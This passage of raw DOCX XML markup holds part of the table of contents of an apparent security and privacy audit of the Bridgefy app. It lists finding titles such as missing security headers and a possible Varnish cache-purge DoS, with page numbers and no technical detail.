              <w:tab w:pos="9003" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250015">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-041</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Missing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Policy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Info)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>114</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9003" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250014">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-042</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>WP2/3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>via</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Absent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Headers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Medium)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>115</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:r>
            <w:rPr/>
            <w:t>BFY</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman"/>
              <w:spacing w:val="1"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>01-044</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>WP3:</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-10"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Possible</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>DoS</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>via</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-10"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Unauthenticated</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Varnish</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-10"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Cache</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>Purge</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-9"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>(Low)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-32"/>
            </w:rPr>
            <w:t> </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-5"/>
            </w:rPr>
            <w:t>117</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:pos="8999" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250013">
            <w:r>
              <w:rPr/>
              <w:t>Privacy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>119</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="9003" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250012">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q02:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>gathered</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>by</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Proven)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>119</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250011">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q03:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>How</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>transmits</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Proven)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>121</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250010">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q04:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>How</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>protects</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>PII</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>at</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>rest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>transit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Proven)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250009">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q05:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>How</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>protects</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>at</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Rest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>In</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Transit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Proven)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250008">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q06:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>gathers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>more</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>than</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>strictly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>necessary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Proven)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>125</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250007">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q07:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>does</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>appear</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>track</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Assumed)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250006">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q08:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>does</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>seem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>weaken</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Crypto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>intentionally</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Unclear)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250005">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q09:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>does</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>appear</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>use</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>SD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Card</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>insecurely</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Unclear)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>129</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250004">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q10:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>seems</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>free</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>RCE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Unclear)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>130</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250003">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q11:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-13"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>does</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>appear</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
